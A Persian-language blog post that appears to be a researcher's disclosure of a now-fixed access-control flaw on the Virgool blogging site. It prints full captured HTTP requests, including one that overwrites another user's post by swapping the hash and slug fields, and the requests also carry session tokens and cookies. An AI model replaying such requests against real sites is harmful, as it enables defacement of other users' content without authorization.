این نوشته مربوط به یک آسیب پذیری هست که تو ویرگول کشف کردم و در حال حاضر مرتفع شده.
در حال بررسی امکانات سایت ویرگول بودم که نوبت به قسمت نوشتن پست جدید رسید و شروع کردم به وارد کردن عنوان و متن نوشته که متوجه تغییر متن کنار لوگوی ویرگول شدم که بعد از هر چند کلمه نوشتن و ایستادن به در حال ذخیره... و سپس به ذخیره شده تغییر پیدا می کرد.
متوجه شدم که ویرگول بعد از هر تغییر در نوشته ، نتیجه رو ارسال میکنه و به حالت پیش نویس ذخیره میکنه ، کنجکاو شدم ببینم که این درخواست هایی که برای ذخیره لحظه ای متن ارسال می شدند به چه صورتی هستند؟! ، پس یک درخواست رو گرفتم و بررسی کردم.
درخواست:
POST /api/v1.2/editor/draft HTTP/1.1 Host: virgool.io User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://virgool.io/d/pcoljm27ttep/edit Content-Type: application/json;charset=utf-8 Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0 X-XSRF-TOKEN: eyJpdiI6Imx1Unh5WThheVpQMklRSTJmRWtyMmc9PSIsInZhbHVlIjoiWEFRNHhMXC8yYVBwQkY2UUJqZzJRMjVCelBXK2hvWjdRVjdJUm5EbThxWHdZY0xQOVFheTFtVDRNREhTRmhkWkoiLCJtYWMiOiJmYWY2OThlODIxN2I3MTIzZWNkYjdlYjEwMDM2YjkwNDQxNWZiMDYyNWQzNTk5MmU0ZDg0MWExY2M5YTU2MzE4In0= Content-Length: 204 DNT: 1 Connection: close Cookie: PHPSESSID=8g3n4cpsnlgjdoi3jq3ftpjcqe; XSRF-TOKEN=eyJpdiI6Imx1Unh5WThheVpQMklRSTJmRWtyMmc9PSIsInZhbHVlIjoiWEFRNHhMXC8yYVBwQkY2UUJqZzJRMjVCelBXK2hvWjdRVjdJUm5EbThxWHdZY0xQOVFheTFtVDRNREhTRmhkWkoiLCJtYWMiOiJmYWY2OThlODIxN2I3MTIzZWNkYjdlYjEwMDM2YjkwNDQxNWZiMDYyNWQzNTk5MmU0ZDg0MWExY2M5YTU2MzE4In0%3D; vrgl_sess=eyJpdiI6ImZtUUVcL08rSGtYXC9MMExBc2hqWVg4Zz09IiwidmFsdWUiOiJKOERNM2w1NlM4WXdWU3huTVJEMzBlcWZBNFZacStqMnpTQ1RtSnR3VVVyWGtoTXQ4M3RXdUxJUDhneU5sVVpJIiwibWFjIjoiN2JhYzY3OTFlNGQ5NWY4YTE5MTNhMDc2ZjBiNDEzOTkzYTJmY2FmOTM0ZmEzNTIzY2U4YzlhMmQ0ZmNkMjRjNyJ9; rec=eyJpdiI6ImhKZCtHa1hMVHpiV2dvSERcLysrVk5nPT0iLCJ2YWx1ZSI6IlM0Tnh3RDdcL2VmZWgzeEhlNDVSNkpBPT0iLCJtYWMiOiJkYmVkMjY0ZDQ0NTYyOGY2NzBlNTMxMDAzZDIxNTgyMDIyZTEwYjMxOWM2NDk2MGI2YTcyOWM1YmU0MGU2ZjBiIn0%3D; _hp2_id.2248261963=%7B%22userId%22%3A%227281601450853186%22%2C%22pageviewId%22%3A%228971263574404344%22%2C%22sessionId%22%3A%224648087988148446%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; auth_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0; jwts=eyJpdiI6ImdFTGU5K0NUYWRjZnhTV1M1cjhvWmc9PSIsInZhbHVlIjoiNWhKeFROdFhpYUFLNmtIU3NZVVZoNWNTQVp1c2U5Sk5oREorY1JYNkJlVk10OEp6UlgrMmQ4ZldPeXFqbTBqRiIsIm1hYyI6IjgwMjU5ZDYxMTQ1MDk1MTRhOGMzYTBiMDA5NTA4NGM1YTI1OGUyZGQ1ZDdlOTA5ZGM0MDEwZjkzMDVjYmQwN2IifQ%3D%3D; uid=yttbeijzgh5z; _vcfg=%7B%22tpcs_c%22%3A49%7D; __cfduid=de6fe6ac80c6fe23e181108c89940a6871563192046; nightmode={%22value%22:0%2C%22userMenu%22:0%2C%22active%22:0}; _hp2_ses_props.2248261963=%7B%22ts%22%3A1563215804535%2C%22d%22%3A%22virgool.io%22%2C%22h%22%3A%22%2F%22%7D; G38lFwkS5Dq=eyJpdiI6Ilh5bWRlODdUeVdTR0xBZUhkdEx0R0E9PSIsInZhbHVlIjoiOWt5dlVWOVwveXc4SzB2a1gyTDBiZm4xSU1aTnlINGVmcEZydkQ3dEF2Q2E2Y0Q5TjBnMFNoN2FUVXpVWFJXaXkiLCJtYWMiOiI4MWJkMWQ5Nzg1ZjFhNzMxYWQxNWQ1MGQyN2ZiYjJlMmI4MzVjNWM1MTY1ZDNkMWQxNGM5ZGUxZDE0NDAxZTI3In0%3D {"post_id":"","hash":"pcoljm27ttep","title":"Hello World","tag":"","body":"<p class=\"md-block-unstyled\">Hello Virgool.io. Its a sample post. </p>","words_count":6,"og_description":"","primary_img":null}
جواب:
HTTP/1.1 200 OK Server: nginx/1.15.9 Date: Mon, 15 Jul 2019 18:58:56 GMT Content-Type: application/json Connection: close Vary: Accept-Encoding X-Powered-By: Virgool Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cache-Control: no-cache, private X-RateLimit-Limit: 1000 X-RateLimit-Remaining: 997 Set-Cookie: vrgl_sess=eyJpdiI6IndXalBmRGRZcFZHSXV4cis1V2VrUEE9PSIsInZhbHVlIjoidUFHTFlrcUJSNytjc3BcL0tIWEk5cGxQazE3b3BZZ25uRVRuVGdNQXZZWkJTSCtvUEJpTEcrNlFISSt4VjdrNnUiLCJtYWMiOiIxYjRhMmIyNWVlN2YzN2ViNzA0YjgwNWE5NjU1OTE0MzZkMzI1MzUzZThmMmMwYTE5YzFiNzc5MGU0NjQ5YTc2In0%3D; expires=Tue, 16-Jul-2019 18:50:28 GMT; Max-Age=86400; path=/; httponly X-Frame-Options: sameorigin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'self' files.virgool.io blob:; connect-src 'self' https://www.google-analytics.com stats.vstat.ir heapanalytics.com cdn.iframe.ly https://geoip-db.com; font-src 'self' data: https://virgool.io; img-src blob: data: https: 'self' files.virgool.io https://www.google-analytics.com; object-src 'self' virgool.io; media-src cdn.virgool.io; script-src 'self' blob: https://virgool.io 'unsafe-eval' 'unsafe-inline' www.googletagmanager.com https://www.google-analytics.com js-agent.newrelic.com stats.vstat.ir bam.eu01.nr-data.net heapanalytics.com cdn.iframe.ly https://cdn.iframe.ly https://geoip-db.com https: 'self'; style-src 'unsafe-inline' data: https: 'self'; frame-src 'self' cdn.iframe.ly https://cdn.iframe.ly chromenull: https: webviewprogressproxy: ; worker-src blob: 'self'; Strict-Transport-Security: max-age=15724800; includeSubDomains Content-Length: 16 {"success":true}
درخواست ارسالی اطلاعات رو در قالب JSON ارسال می کرد پس من اون رو مرتب کردم تا بهتر ببینم.
{ "post_id":"", "hash":"pcoljm27ttep", "title":"Hello World", "tag":"", "body":"<p class=\"md-block-unstyled\">Hello Virgool.io. Its a sample post. </p>", "words_count":6, "og_description":"", "primary_img":null }
بین اطلاعات ارسالی hash توجهم رو جلب کرد و پس از بررسی متوجه شدم که هر پست یه شناسه داره و که آخر لینک هر پست قرار می گیره ، برای نمونه لینک زیر:
https://virgool.io/@virgool/آمار-بازدید-مطالب-من-در-سال-۹۷-ew5ikbzdsebt
خب فاز کردن hash رو شروع کردم و نتایج به صورت زیر بود:
123test ---> {"success":true,"statusCode":"200","data":{"hash":"123"}} test ---> {"success":true,"statusCode":"200","data":{"hash":"test"}} test ---> {"success":true}
به قسمت پیش نویس ها رفتم و نتیجه به شکل زیر بود.
تو مرحله ی اولیه فازینگ متوجه شدم که کنترلی روی ورودی وجود نداره! در نتیجه میشد با شناسه ی مورد نظر خودم هر پیش نویسی ایجاد کنم.
ولی آیا مرحله ی بعد یعنی انتشار پست هم به همین صورت هست؟!
روی نوشتن پست جدید کلیک کردم و عنوان و متن پست رو وارد کردم و روی انتشار نوشته کلیک کردم.
درخواست:
POST /api/v1.2/editor/publish HTTP/1.1 Host: virgool.io User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://virgool.io/d/pcoljm27ttep/edit Content-Type: application/json;charset=utf-8 Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0 X-XSRF-TOKEN: eyJpdiI6InFZczd6VmduMzRka3Y5eVBZcVwvY3RnPT0iLCJ2YWx1ZSI6IlwvNUlCMlpLNG80Nm1TdHUzRlNZUXhlZjk1R2NSZHdmMURyXC8zaHdWbWg1S1FNVUlpUWhqc0ZxVlZWcnNMV0FkNSIsIm1hYyI6IjczOGYyMGUzMjkxODY2MTQ3ZmY5M2YzOWMxMDI3OGIzM2U2NDkyZTMxYTkwZGFmNWM0ODBmYTkxZGIxZGY1YjkifQ== Content-Length: 833 DNT: 1 Connection: close Cookie: PHPSESSID=8g3n4cpsnlgjdoi3jq3ftpjcqe; XSRF-TOKEN=eyJpdiI6InFZczd6VmduMzRka3Y5eVBZcVwvY3RnPT0iLCJ2YWx1ZSI6IlwvNUlCMlpLNG80Nm1TdHUzRlNZUXhlZjk1R2NSZHdmMURyXC8zaHdWbWg1S1FNVUlpUWhqc0ZxVlZWcnNMV0FkNSIsIm1hYyI6IjczOGYyMGUzMjkxODY2MTQ3ZmY5M2YzOWMxMDI3OGIzM2U2NDkyZTMxYTkwZGFmNWM0ODBmYTkxZGIxZGY1YjkifQ%3D%3D; vrgl_sess=eyJpdiI6Ik94VkV3MTlxSzF3bXJvR2gzNml3WVE9PSIsInZhbHVlIjoib2VQTTgzSERleXJXbHhnWDhjNlU5UnJ0XC9xYVVKYzhydVwvVDl3bEs0SENmNWFTZFwvY2ZkamE4ZnEzbm9yYmJXZyIsIm1hYyI6ImJjZTcyZTI4MmU4ZDk3OGM5MDFmYWI2MjgyNzQwNTM2NGYwNjY5OGU2M2QwNTM2ZThkMTk2ZjUzOWM3MWYxYzEifQ%3D%3D; rec=eyJpdiI6ImhKZCtHa1hMVHpiV2dvSERcLysrVk5nPT0iLCJ2YWx1ZSI6IlM0Tnh3RDdcL2VmZWgzeEhlNDVSNkpBPT0iLCJtYWMiOiJkYmVkMjY0ZDQ0NTYyOGY2NzBlNTMxMDAzZDIxNTgyMDIyZTEwYjMxOWM2NDk2MGI2YTcyOWM1YmU0MGU2ZjBiIn0%3D; _hp2_id.2248261963=%7B%22userId%22%3A%227281601450853186%22%2C%22pageviewId%22%3A%222141144530700276%22%2C%22sessionId%22%3A%221736030237244822%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; auth_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0; jwts=eyJpdiI6ImdFTGU5K0NUYWRjZnhTV1M1cjhvWmc9PSIsInZhbHVlIjoiNWhKeFROdFhpYUFLNmtIU3NZVVZoNWNTQVp1c2U5Sk5oREorY1JYNkJlVk10OEp6UlgrMmQ4ZldPeXFqbTBqRiIsIm1hYyI6IjgwMjU5ZDYxMTQ1MDk1MTRhOGMzYTBiMDA5NTA4NGM1YTI1OGUyZGQ1ZDdlOTA5ZGM0MDEwZjkzMDVjYmQwN2IifQ%3D%3D; uid=yttbeijzgh5z; _vcfg=%7B%22tpcs_c%22%3A49%7D; __cfduid=de6fe6ac80c6fe23e181108c89940a6871563192046; nightmode={%22value%22:0%2C%22userMenu%22:0%2C%22active%22:0}; G38lFwkS5Dq=eyJpdiI6Ilh5bWRlODdUeVdTR0xBZUhkdEx0R0E9PSIsInZhbHVlIjoiOWt5dlVWOVwveXc4SzB2a1gyTDBiZm4xSU1aTnlINGVmcEZydkQ3dEF2Q2E2Y0Q5TjBnMFNoN2FUVXpVWFJXaXkiLCJtYWMiOiI4MWJkMWQ5Nzg1ZjFhNzMxYWQxNWQ1MGQyN2ZiYjJlMmI4MzVjNWM1MTY1ZDNkMWQxNGM5ZGUxZDE0NDAxZTI3In0%3D; _hp2_ses_props.2248261963=%7B%22r%22%3A%22https%3A%2F%2Fvirgool.io%2Fsearch%3Fq%3D%25D9%2588%25DB%258C%25D8%25B1%25DA%25AF%25D9%2588%25D9%2584%2B%25D8%25B3%25D8%25A7%25D9%2584%25D9%2587%2B%25D8%25B4%25D8%25AF%22%2C%22ts%22%3A1563219763200%2C%22d%22%3A%22virgool.io%22%2C%22h%22%3A%22%2F%40virgool_ir%22%7D {"post_id":"","hash":"pcoljm27ttep","title":"Hello World","body":"<p class=\"md-block-unstyled\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>","slug":"hello-world","tag":"","words_count":6,"og_description":null,"primary_img":null}
جواب:
HTTP/1.1 200 OK Server: nginx/1.15.9 Date: Mon, 15 Jul 2019 20:00:49 GMT Content-Type: application/json Connection: close Vary: Accept-Encoding X-Powered-By: Virgool Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cache-Control: no-cache, private X-RateLimit-Limit: 1000 X-RateLimit-Remaining: 994 Set-Cookie: vrgl_sess=eyJpdiI6ImFPa01wQ2ZzWjRESHdoM1lkbEx2ZFE9PSIsInZhbHVlIjoiVzdlZU9oK1lENFZsOE9cL0NuNHVocVRyNWNaYWxGeUZuc203THpMa21YUDZLVFhxbGYxaDIwbzVHSlVwZWk4Z1wvIiwibWFjIjoiMDViMGZlNWVmYzNlMDFjMDI1ZDllZDBiZjI2ZDg0YmI4Y2FhZTViNDZlNWU4N2U4YjYzYThiY2MzNWJmMTc5MSJ9; expires=Tue, 16-Jul-2019 20:09:17 GMT; Max-Age=86400; path=/; httponly X-Frame-Options: sameorigin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'self' files.virgool.io blob:; connect-src 'self' https://www.google-analytics.com stats.vstat.ir heapanalytics.com cdn.iframe.ly https://geoip-db.com; font-src 'self' data: https://virgool.io; img-src blob: data: https: 'self' files.virgool.io https://www.google-analytics.com; object-src 'self' virgool.io; media-src cdn.virgool.io; script-src 'self' blob: https://virgool.io 'unsafe-eval' 'unsafe-inline' www.googletagmanager.com https://www.google-analytics.com js-agent.newrelic.com stats.vstat.ir bam.eu01.nr-data.net heapanalytics.com cdn.iframe.ly https://cdn.iframe.ly https://geoip-db.com https: 'self'; style-src 'unsafe-inline' data: https: 'self'; frame-src 'self' cdn.iframe.ly https://cdn.iframe.ly chromenull: https: webviewprogressproxy: ; worker-src blob: 'self'; Strict-Transport-Security: max-age=15724800; includeSubDomains Content-Length: 190 {"success":"\u067e\u0633\u062a \u0634\u0645\u0627 \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0648\u06cc\u0631\u0627\u06cc\u0634 \u0634\u062f","post_slug":"hello-world-pcoljm27ttep"}
اطلاعات پست مجددا تو قالب JSON ارسال شدن و توی جواب پیام موفقیت آمیز بودن و آدرس پست(slug) رو برگردونند.
JSON ارسالی رو مرتب کردم و شروع به بررسی کردم.
{ "post_id":"", "hash":"pcoljm27ttep", "title":"Hello World", "body":"<p class=\"md-block-unstyled\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>", "slug":"hello-world-pcoljm27ttep", "tag":"", "words_count":6, "og_description":null, "primary_img":null }
دیدم که علاوه بر hash ، مقدار slug یا همون آدرس پست هم ارسال میشه، از اونجایی که تو فازینگ hash تو پیشنویس متوجه شدم کنترلی روی ورودی hash نیست سناریوی زیر اومد تو ذهنم :)
اگه hash و slug یه پست دیگه رو بفرستم چی؟! پست ویرایش میشه یا خطا میده ؟!
پس یکم محتوای پست رو تغییر دادم :) و hash و slug یه پست دیگه رو از لینکش برداشتم و جایگزین کردم و ارسال کردم.
درخواست:
POST /api/v1.2/editor/publish HTTP/1.1 Host: virgool.io User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://virgool.io/d/pcoljm27ttep/edit Content-Type: application/json;charset=utf-8 Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0 X-XSRF-TOKEN: eyJpdiI6InFZczd6VmduMzRka3Y5eVBZcVwvY3RnPT0iLCJ2YWx1ZSI6IlwvNUlCMlpLNG80Nm1TdHUzRlNZUXhlZjk1R2NSZHdmMURyXC8zaHdWbWg1S1FNVUlpUWhqc0ZxVlZWcnNMV0FkNSIsIm1hYyI6IjczOGYyMGUzMjkxODY2MTQ3ZmY5M2YzOWMxMDI3OGIzM2U2NDkyZTMxYTkwZGFmNWM0ODBmYTkxZGIxZGY1YjkifQ== Content-Length: 833 DNT: 1 Connection: close Cookie: PHPSESSID=8g3n4cpsnlgjdoi3jq3ftpjcqe; XSRF-TOKEN=eyJpdiI6InFZczd6VmduMzRka3Y5eVBZcVwvY3RnPT0iLCJ2YWx1ZSI6IlwvNUlCMlpLNG80Nm1TdHUzRlNZUXhlZjk1R2NSZHdmMURyXC8zaHdWbWg1S1FNVUlpUWhqc0ZxVlZWcnNMV0FkNSIsIm1hYyI6IjczOGYyMGUzMjkxODY2MTQ3ZmY5M2YzOWMxMDI3OGIzM2U2NDkyZTMxYTkwZGFmNWM0ODBmYTkxZGIxZGY1YjkifQ%3D%3D; vrgl_sess=eyJpdiI6Ik94VkV3MTlxSzF3bXJvR2gzNml3WVE9PSIsInZhbHVlIjoib2VQTTgzSERleXJXbHhnWDhjNlU5UnJ0XC9xYVVKYzhydVwvVDl3bEs0SENmNWFTZFwvY2ZkamE4ZnEzbm9yYmJXZyIsIm1hYyI6ImJjZTcyZTI4MmU4ZDk3OGM5MDFmYWI2MjgyNzQwNTM2NGYwNjY5OGU2M2QwNTM2ZThkMTk2ZjUzOWM3MWYxYzEifQ%3D%3D; rec=eyJpdiI6ImhKZCtHa1hMVHpiV2dvSERcLysrVk5nPT0iLCJ2YWx1ZSI6IlM0Tnh3RDdcL2VmZWgzeEhlNDVSNkpBPT0iLCJtYWMiOiJkYmVkMjY0ZDQ0NTYyOGY2NzBlNTMxMDAzZDIxNTgyMDIyZTEwYjMxOWM2NDk2MGI2YTcyOWM1YmU0MGU2ZjBiIn0%3D; _hp2_id.2248261963=%7B%22userId%22%3A%227281601450853186%22%2C%22pageviewId%22%3A%222141144530700276%22%2C%22sessionId%22%3A%221736030237244822%22%2C%22identity%22%3Anull%2C%22trackerVersion%22%3A%224.0%22%7D; auth_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvdmlyZ29vbC5pb1wvYXBpXC92MS4yXC9sb2dpbiIsImlhdCI6MTU2MzE5MjAzOSwiZXhwIjoxNTg2ODQ0MDM5LCJuYmYiOjE1NjMxOTIwMzksImp0aSI6InhjYlZBdkVuUGhiNzJWbjAiLCJzdWIiOjI2OTg5LCJwcnYiOiI4N2UwYWYxZWY5ZmQxNTgxMmZkZWM5NzE1M2ExNGUwYjA0NzU0NmFhIn0; jwts=eyJpdiI6ImdFTGU5K0NUYWRjZnhTV1M1cjhvWmc9PSIsInZhbHVlIjoiNWhKeFROdFhpYUFLNmtIU3NZVVZoNWNTQVp1c2U5Sk5oREorY1JYNkJlVk10OEp6UlgrMmQ4ZldPeXFqbTBqRiIsIm1hYyI6IjgwMjU5ZDYxMTQ1MDk1MTRhOGMzYTBiMDA5NTA4NGM1YTI1OGUyZGQ1ZDdlOTA5ZGM0MDEwZjkzMDVjYmQwN2IifQ%3D%3D; uid=yttbeijzgh5z; _vcfg=%7B%22tpcs_c%22%3A49%7D; __cfduid=de6fe6ac80c6fe23e181108c89940a6871563192046; nightmode={%22value%22:0%2C%22userMenu%22:0%2C%22active%22:0}; G38lFwkS5Dq=eyJpdiI6Ilh5bWRlODdUeVdTR0xBZUhkdEx0R0E9PSIsInZhbHVlIjoiOWt5dlVWOVwveXc4SzB2a1gyTDBiZm4xSU1aTnlINGVmcEZydkQ3dEF2Q2E2Y0Q5TjBnMFNoN2FUVXpVWFJXaXkiLCJtYWMiOiI4MWJkMWQ5Nzg1ZjFhNzMxYWQxNWQ1MGQyN2ZiYjJlMmI4MzVjNWM1MTY1ZDNkMWQxNGM5ZGUxZDE0NDAxZTI3In0%3D; _hp2_ses_props.2248261963=%7B%22r%22%3A%22https%3A%2F%2Fvirgool.io%2Fsearch%3Fq%3D%25D9%2588%25DB%258C%25D8%25B1%25DA%25AF%25D9%2588%25D9%2584%2B%25D8%25B3%25D8%25A7%25D9%2584%25D9%2587%2B%25D8%25B4%25D8%25AF%22%2C%22ts%22%3A1563219763200%2C%22d%22%3A%22virgool.io%22%2C%22h%22%3A%22%2F%40virgool_ir%22%7D {"post_id":"","hash":"guqjcef3i4qy","title":"Pwn By 0xEhsan","body":"<p class=\"md-block-unstyled\"><b>This Post Is Pwn By 0xEhsan</b><img src='https://files.virgool.io/upload/users/9091/posts/avykxkqiq7t0/aggkngdczbfd.png'> <br>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>","slug":"test-guqjcef3i4qy","tag":"","words_count":91,"og_description":"","primary_img":null}
جواب:
HTTP/1.1 200 OK Server: nginx/1.15.9 Date: Fri, 12 Jul 2019 23:50:09 GMT Content-Type: application/json Connection: close Vary: Accept-Encoding X-Powered-By: Virgool Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cache-Control: no-cache, private X-RateLimit-Limit: 1000 X-RateLimit-Remaining: 998 Set-Cookie: vrgl_sess=eyJpdiI6Ikt0SXc1ZE5JZTlkMEJMNURQVCtKOEE9PSIsInZhbHVlIjoiQ2lwS1JSeUd5REdoVFg5VzZVcklBcUd3blFibFkyc0lhWGRxQU9aYWRHbFpuTklyMEdSN3I5Wm9DeXlxbTR2VCIsIm1hYyI6IjgxZGYxYmMyYmI5ZWJmMjRiZDlmOWIzM2M5MTQ5YzZlODk5MTAwZDg5MmY4MTJiOGI4ZTRkOWFkZTZjMTAyOWUifQ%3D%3D; expires=Tue, 16-Jul-2019 20:12:29 GMT; Max-Age=86400; path=/; httponly X-Frame-Options: sameorigin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'self' files.virgool.io blob:; connect-src 'self' https://www.google-analytics.com stats.vstat.ir heapanalytics.com cdn.iframe.ly https://geoip-db.com; font-src 'self' data: https://virgool.io; img-src blob: data: https: 'self' files.virgool.io https://www.google-analytics.com; object-src 'self' virgool.io; media-src cdn.virgool.io; script-src 'self' blob: https://virgool.io 'unsafe-eval' 'unsafe-inline' www.googletagmanager.com https://www.google-analytics.com js-agent.newrelic.com stats.vstat.ir bam.eu01.nr-data.net heapanalytics.com cdn.iframe.ly https://cdn.iframe.ly https://geoip-db.com https: 'self'; style-src 'unsafe-inline' data: https: 'self'; frame-src 'self' cdn.iframe.ly https://cdn.iframe.ly chromenull: https: webviewprogressproxy: ; worker-src blob: 'self'; Strict-Transport-Security: max-age=15724800; includeSubDomains Content-Length: 183 {"success":"\u067e\u0633\u062a \u0634\u0645\u0627 \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0648\u06cc\u0631\u0627\u06cc\u0634 \u0634\u062f","post_slug":"test-guqjcef3i4qy"}
و بــــــــــــوم!!!
جواب درخواست success بود و حیرت زده شدم و این یعنی کنترلی روی ورودی hash نیست و پست مورد نظر من تغییر کرده ، پس وارد لینک پست شدم.
نتیجه درست بود و پست مورد نظرم با موفقیت تغییر پیدا کرد ، در نتیجه من با استفاده از این آسیب پذیری می تونستم هر کدوم از پست های توی سایت ویرگول رو تغییر بدم.
لینک ویدئو اثبات آسیبپذیری:
https://www.youtube.com/watch?v=CIE00HbDF1c
و در پایان هم یه تشکر ویژه از یاشار شاهین زاده عزیزم برای پیگیری این آسیب پذیری و همچنین برخورد حرفه ای و سرعت عمل تیم ویرگول در برطرف کردن این آسیب پذیری.
